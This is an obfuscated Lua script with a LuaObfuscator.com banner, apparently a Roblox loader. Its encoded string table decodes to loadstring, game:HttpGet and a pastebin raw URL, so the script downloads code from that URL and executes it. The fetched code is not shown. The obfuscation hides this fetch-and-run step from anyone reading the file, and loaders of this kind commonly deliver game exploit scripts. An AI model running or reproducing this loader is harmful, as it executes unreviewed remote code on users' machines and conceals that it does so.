--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then v18=v0(v3(v29,1,1));return "";else local v63=v2(v0(v29,16));if v18 then local v71=0;local v72;while true do if (v71==0) then v72=v5(v63,v18);v18=nil;v71=1;end if (1==v71) then return v72;end end else return v63;end end end);local function v19(v30,v31,v32)if v32 then local v64=(v30/((1426 -(93 + 176 + 1155))^(v31-1)))%((2 + 0)^(((v32-(2 -1)) -(v31-(170 -(22 + 147)))) + (4 -(7 -4))));return v64-(v64%1);else local v65=(2 + (0 -0))^(v31-1);return (((v30%(v65 + v65))>=v65) and ((1978 -(820 + 417)) -(289 + 354 + 97))) or (0 -(0 -0));end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38=0 -0;local v39;local v40;while true do if (v38==(2 -1)) then return (v40 * (1010 -(1023 -269))) + v39;end if ((0 + 0)==v38) then v39,v40=v1(v15,v17,v17 + ((9 -4) -3));v17=v17 + (2 -1) + 1;v38=1;end end end local function v22()local v41=0 -0;local v42;local v43;local v44;local v45;while true do if (v41==(3 -2)) then return (v45 * (16778825 -(465 + 703 + 441))) + (v44 * (65785 -(71 + 178))) + (v43 * (962 -(5 + 185 + 516))) + v42;end if (v41==(0 -0)) then v42,v43,v44,v45=v1(v15,v17,v17 + 1 + 2);v17=v17 + (1538 -(1368 + 166));v41=1 -0;end end end local function v23()local v46=v22();local v47=v22();return (( -(9 -7) * v19(v47,60 -28)) + 1 + 0 + 0) * ((1 + 1)^(v19(v47,15 + 6,92 -61) -1023)) * ((((v19(v47,1023 -(712 + (1928 -(1077 + 541))),118 -(25 + 73)) * ((2 + 0)^((1046 -643) -(154 + 217)))) + v46)/((8 -6)^(3 + 49))) + (2 -1));end local function v24(v33)local v48=0 + 0 + 0;local v49;local v50;while true do if (v48==(2 -1)) then v49=v3(v15,v17,(v17 + v33) -(1 + 0 + 0));v17=v17 + v33;v48=2 -(633 -(28 + 605));end if (v48==(2 + 0)) then v50={};for v73=1034 -(673 + 360), #v49 do v50[v73]=v2(v1(v3(v49,v73,v73)));end v48=1 + 2;end if (v48==(1 + 2)) then return v6(v50);end if ((898 -((238 -94) + 754))==v48) then v49=nil;if  not v33 then v33=v22();if (v33==(0 -0)) then return "";end end v48=1 + 0;end end end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=1) then else v54=nil;v55=nil;v51=2;end if (v51~=(1407 -(29 + 1375))) then else v58=nil;v59=nil;v51=4;end if (v51~=(0 -0)) then else v52=0;v53=nil;v51=1 + 0;end if (v51~=(4 -2)) then else v56=nil;v57=nil;v51=3 + 0;end if ((424 -(186 + 234))~=v51) then else while true do if (v52==(1961 -(399 + 1559))) then v59=nil;while true do local v91=0;local v92;while true do if ((0 -0)==v91) then v92=1700 -(1258 + 442);while true do if ((1 -0)~=v92) then else if (v53==(1 + 2)) then local v114=509 -(169 + 340);local v115;while true do if (v114==(966 -(102 + 864))) then v115=0 + 0;while true do if (v115~=(378 -(261 + 117))) then else local v128=0 -0;while true do if (v128~=(444 -(283 + 161))) then else for v142=185 -(118 + 66),v22() do v55[v142-(1 + 0)]=v27();end for v144=4 -3,v22() do v56[v144]=v22();end v128=1 + 0;end if (v128==(1 + 0)) then v115=367 -(15 + 351);break;end end end if (v115==(1 + 0)) then return v57;end end break;end end end if (v53==(4 -2)) then local v116=261 -(258 + 3);while true do if (v116==(1738 -(1189 + 549))) then local v121=0 -0;while true do if (v121~=(1 + 0)) then else v116=3 -2;break;end if (v121~=(0 + 0)) then else local v129=0 + 0;while true do if (v129==(0 + 0)) then for v146=1 + 0,v58 do local v147=0;local v148;local v149;local v150;while true do if (v147==0) then v148=0;v149=nil;v147=1 + 0;end if (v147~=(1 + 0)) then else v150=nil;while true do if (v148~=0) then else local v159=296 -(159 + 137);local v160;while true do if (v159~=(1208 -(826 + 382))) then else v160=0 + 0;while true do if (v160==(0 -0)) then v149=v20();v150=nil;v160=353 -(273 + 79);end if (v160~=(1 + 0)) then else v148=1 + 0;break;end end break;end end end if ((1 + 0)~=v148) then else if (v149==1) then v150=v20()~=(0 -0);elseif (v149==(2 + 0)) then v150=v23();elseif (v149~=3) then else v150=v24();end v59[v146]=v150;break;end end break;end end end v57[1710 -(484 + 1223)]=v20();v129=1 -0;end if (v129~=1) then else v121=4 -3;break;end end end end end if (v116==1) then for v123=940 -(424 + 515),v22() do local v124=0;local v125;local v126;while true do if (v124~=(345 -(166 + 178))) then else while true do if (v125==(0 -0)) then v126=v20();if (v19(v126,3 -2,537 -(309 + 227))==(755 -(300 + 455))) then local v152=1448 -(539 + 909);local v153;local v154;local v155;local v156;while true do if ((0 -0)~=v152) then else v153=0 -0;v154=nil;v152=1 -0;end if (v152==(4 -3)) then v155=nil;v156=nil;v152=2 + 0;end if (v152~=(2 + 0)) then else while true do if ((0 -0)~=v153) then else local v162=0;local v163;while true do if (v162~=(680 -(366 + 314))) then else v163=0 -0;while true do if (v163==(1 + 0)) then v153=1;break;end if ((204 -(131 + 73))~=v163) then else local v170=0;while true do if (v170==(1 + 0)) then v163=3 -2;break;end if ((816 -(624 + 192))==v170) then v154=v19(v126,1929 -(660 + 1267),3);v155=v19(v126,2 + 2,1251 -(542 + 703));v170=1 + 0;end end end end break;end end end if (v153~=2) then else if (v19(v155,1296 -(613 + 682),1690 -(81 + 1608))~=(3 -2)) then else v156[2]=v59[v156[2]];end if (v19(v155,3 -1,9 -7)==(1 + 0)) then v156[7 -4]=v59[v156[7 -4]];end v153=1 + 2;end if (v153==3) then if (v19(v155,1115 -(741 + 371),1856 -(168 + 1685))==1) then v156[13 -9]=v59[v156[4]];end v54[v123]=v156;break;end if (v153~=(2 -1)) then else local v165=1808 -(1177 + 631);while true do if (v165==0) then local v169=0 + 0;while true do if (v169~=(1951 -(35 + 1916))) then else v156={v21(),v21(),nil,nil};if (v154==0) then local v171=0 + 0;local v172;while true do if (0~=v171) then else v172=0 + 0;while true do if ((421 -(124 + 297))==v172) then v156[2 + 1]=v21();v156[2 + 2]=v21();break;end end break;end end elseif (v154==(615 -(344 + 270))) then v156[3]=v22();elseif (v154==(2 + 0)) then v156[7 -4]=v22() -((1 + 1)^(33 -17));elseif (v154~=(4 -1)) then else local v177=0 + 0;local v178;while true do if (v177~=(108 -(74 + 34))) then else v178=0;while true do if (v178==(0 -0)) then v156[1009 -(661 + 345)]=v22() -((5 -3)^16);v156[1592 -(1554 + 34)]=v21();break;end end break;end end end v169=2 -1;end if (v169~=1) then else v165=1 + 0;break;end end end if (v165~=(1398 -(1238 + 159))) then else v153=733 -(38 + 693);break;end end end end break;end end end break;end end break;end if ((0 -0)==v124) then v125=0;v126=nil;v124=1;end end end v53=523 -(518 + 2);break;end end end break;end if (v92~=(0 -0)) then else if (v53~=(2 -1)) then else local v117=0;while true do if (v117~=(202 -(77 + 124))) then else v59={};v53=1900 -(1555 + 343);break;end if (v117==0) then local v122=0;while true do if ((0 -0)~=v122) then else v57={v54,v55,nil,v56};v58=v22();v122=3 -2;end if (v122~=1) then else v117=1;break;end end end end end if ((0 + 0)~=v53) then else local v118=1232 -(724 + 508);local v119;while true do if (v118~=(0 + 0)) then else v119=0 + 0;while true do if (v119~=(2 -1)) then else v56={};v53=1 + 0;break;end if ((0 -0)==v119) then local v130=1861 -(883 + 978);while true do if ((699 -(512 + 186))==v130) then v119=3 -2;break;end if (v130~=(1639 -(702 + 937))) then else local v138=0 -0;while true do if (v138~=(0 -0)) then else v54={};v55={};v138=2 -1;end if (v138~=1) then else v130=3 -2;break;end end end end end end break;end end end v92=1;end end break;end end end break;end if (v52==(0 + 0)) then local v88=0 -0;while true do if (v88==(1257 -(976 + 281))) then v53=1699 -(99 + 1600);v54=nil;v88=1;end if (v88~=(345 -(42 + 302))) then else v52=1;break;end end end if (v52==(3 -1)) then local v89=0;while true do if (v89~=(159 -(107 + 52))) then else local v96=0;while true do if (v96~=(1 + 0)) then else v89=1;break;end if (v96==0) then v57=nil;v58=nil;v96=4 -3;end end end if (v89==(1 -0)) then v52=770 -(71 + 696);break;end end end if ((1 -0)~=v52) then else local v90=433 -(245 + 188);while true do if (v90==(0 + 0)) then local v97=753 -(122 + 631);while true do if (v97~=(1 + 0)) then else v90=4 -3;break;end if (v97~=0) then else v55=nil;v56=nil;v97=1;end end end if (v90~=(4 -3)) then else v52=2;break;end end end end break;end end end local function v28(v34,v35,v36)local v60=v34[1];local v61=v34[2];local v62=v34[3];return function(...)local v66=1;local v67= -1;local v68={...};local v69=v11("#",...) -1;local function v70()local v75=v60;local v76=v61;local v77=v62;local v78=v26;local v79={};local v80={};local v81={};for v86=0 -0,v69 do if (((11265 -8615)<(1900 + 2174)) and (v86>=v77)) then v79[v86-v77]=v68[v86 + (1 -(0 -0))];else v81[v86]=v68[v86 + 1 + 0];end end local v82=(v69-v77) + (904 -(706 + 197));local v83;local v84;while true do local v87=0 + 0;while true do if (((1205 + 479)<(32 + 3739)) and (v87==(0 -0))) then local v95=853 -(347 + 506);while true do if (((1811 + (1169 -(13 + 555)))==2412) and (v95==(414 -(309 + 104)))) then v87=2 -1;break;end if (((3677 -(57 + 73))>=(4250 -(384 + 685))) and (v95==(0 -0))) then v83=v75[v66];v84=v83[1 -0];v95=1 + 0;end end end if ((((6243 -(808 + 518)) -((2073 -1181) + 237))<=(334 + 3528 + 170)) and (v87==1)) then if ((v84<=(472 -(380 + 90))) or ((6589 -3319)==(70 + 789))) then if (((3538 + 396)>=(8176 -(17786 -13172))) and (v84<=(0 -0))) then local v98=0;local v99;while true do if (((155 + 2502)<(5610 -(667 + 913))) and (v98==(0 -0))) then v99=v83[(3 -1) + 0];v81[v99]=v81[v99](v12(v81,v99 + (1373 -(1353 + 19)),v67));break;end end elseif (((2514 + 632 + 327)==(1646 + 1827)) and (v84==((298 + 766) -(538 + 525)))) then v81[v83[2 + 0]]();else local v100=1837 -(549 + 1288);local v101;local v102;local v103;local v104;while true do if (((1897 -(697 + 371))<=(440 + 1527)) and (v100==0)) then v101=796 -(401 + 395);v102=nil;v100=1;end if ((3564>(409 + 1845)) and (v100==(2 + 0))) then while true do if (((3 -2)==v101) or (3488>(2178 + 1349))) then v104=nil;while true do if ((v102==((0 + 0) -0)) or ((795 + 128 + 3165)<=(2130 -(202 + 11)))) then local v131=0 -0;while true do if (((5190 -(266 + 1670))>=(2191 -(52 + 175))) and (v131==(45 -((2005 -(461 + 1532)) + 33)))) then local v151=0 + 0;while true do if ((v151==(640 -(18 + 622))) or ((4336 -1292)>=(8903 -5411))) then v103=v83[264 -(161 + 101)];v104=v81[v83[708 -(336 + 369)]];v151=1 + 0;end if ((v151==((4 -3) + 0 + 0)) or (4646<1726)) then v131=1 -0;break;end end end if ((((44130 -32557) -(21790 -14396))>=(1903 + 844)) and (v131==((1 + 0) -(0 + 0)))) then v102=1 + 0;break;end end end if ((3148<=(4190 -(229 + 701))) and (v102==1)) then v81[v103 + 1]=v104;v81[v103]=v104[v83[4 + 0]];break;end end break;end if ((v101==((5306 -3686) -(49 + 1571))) or ((4214 -2101)==(590 + 168))) then local v127=0 + 0;while true do if ((v127==1) or ((7260 -2759)<(525 + 2114 + 13))) then v101=1 + 0;break;end if ((2070<(1315 + 1267)) and (v127==(359 -(305 + 54)))) then v102=0 + 0;v103=nil;v127=1 + 0 + 0;end end end end break;end if ((v100==(1 + 0)) or (((19261 -10996) -5176)>(1114 + 2899))) then v103=nil;v104=nil;v100=6 -4;end end end elseif ((v84<=4) or ((7917 -5672)==(256 + 71))) then if ((v84>(5 -2)) or ((2555 -(182 + 938 + 312))==2413)) then do return;end else local v105=0 + 0;local v106;local v107;local v108;local v109;local v110;local v111;while true do if ((3==v105) or ((2492 -(89 + 572))<(649 + 35))) then while true do if ((v106==(1 + 1)) or ((2258 -(340 + 518))>(10715 -(1741 + 4894)))) then v111=nil;while true do if (((89 + 214)<=(5306 -2146)) and (v107==(319 -(36 + 283)))) then local v134=1250 -(815 + 435);local v135;while true do if ((v134==(899 -(762 + 137))) or ((21053 -16806)<=(309 + 2564))) then v135=0 -0;while true do if ((3118>=1245) and (v135==(4 -3))) then v107=1154 -(964 + (2067 -(1344 + 534)));break;end if (((1160 + 159)<(1103 + 2991)) and (v135==(0 + 0))) then local v157=571 -(464 + 107);while true do if ((v157==(0 -0)) or (4078>(1220 + 3760))) then v108=v83[655 -(98 + 555)];v109,v110=v78(v81[v108](v12(v81,v108 + ((2 + 0) -1),v83[3])));v157=4 -3;end if ((v157==(191 -(67 + 123))) or (1752==(4232 -(210 + 315)))) then v135=2 -1;break;end end end end break;end end end if (((4242 -(763 + 342))>(928 -(111 + 431))) and (v107==(2 -(2 -1)))) then local v136=0;while true do if ((v136==1) or ((12836 -9762)>(4008 -(116 + (394 -(40 + 125)))))) then v107=2;break;end if ((v136==0) or ((3536 -2120)>(3856 + 663))) then v67=(v110 + v108) -(197 -(132 + 64));v111=0 + 0;v136=2 -(1 + 0);end end end if (((7828 -3696)>=(641 + 127 + 1978)) and (v107==(1 + 1))) then for v139=v108,v67 do local v140=0 -0;local v141;while true do if ((v140==(0 -0)) or ((5750 -(1564 + 275))>=(221 + 4174))) then v141=0 + 0;while true do if ((1348>(351 + 263)) and (v141==((1157 + 11) -(1008 + 160)))) then v111=v111 + (874 -(121 + 752));v81[v139]=v109[v111];break;end end break;end end end break;end end break;end if ((v106==(1967 -(1298 + 668))) or ((3965 + 92 + 563)<3646)) then v109=nil;v110=nil;v106=1 + 1;end if ((3420<=4960) and (v106==0)) then v107=365 -(357 + (13 -5));v108=nil;v106=1;end end break;end if ((v105==(0 -0)) or ((2314 -(1320 + 528))<=(49 + 51))) then v106=0;v107=nil;v105=1;end if ((v105==(1 + 0)) or ((1209 -(6 + 528))>=(2435 + 217))) then v108=nil;v109=nil;v105=(2943 -1798) -((1281 -478) + 340);end if ((1077<(846 + 2136)) and ((2 + 0)==v105)) then v110=nil;v111=nil;v105=2 + 1;end end end elseif ((v84>((14 -10) + 1)) or ((662 -((291 -(29 + 37)) + 414))>(4125 -(214 + 509)))) then v81[v83[2 -0]]=v83[1094 -(47 + 731 + 313)];else v81[v83[6 -4]]=v36[v83[3 + 0]];end v66=v66 + 1;break;end end end end A,B=v26(v10(v70));if  not A[1] then local v85=v34[4][v66] or "?";error("Script error at ["   .. v85   .. "]:"   .. A[2]);else return v12(A,2,B);end end;end return v28(v27(),{},v16)(...);end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F5A7362366130386E00083O0012053O00013O001205000100023O002002000100010003001206000300044O0003000100039O0000022O00013O000100012O00043O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v8(),...);end
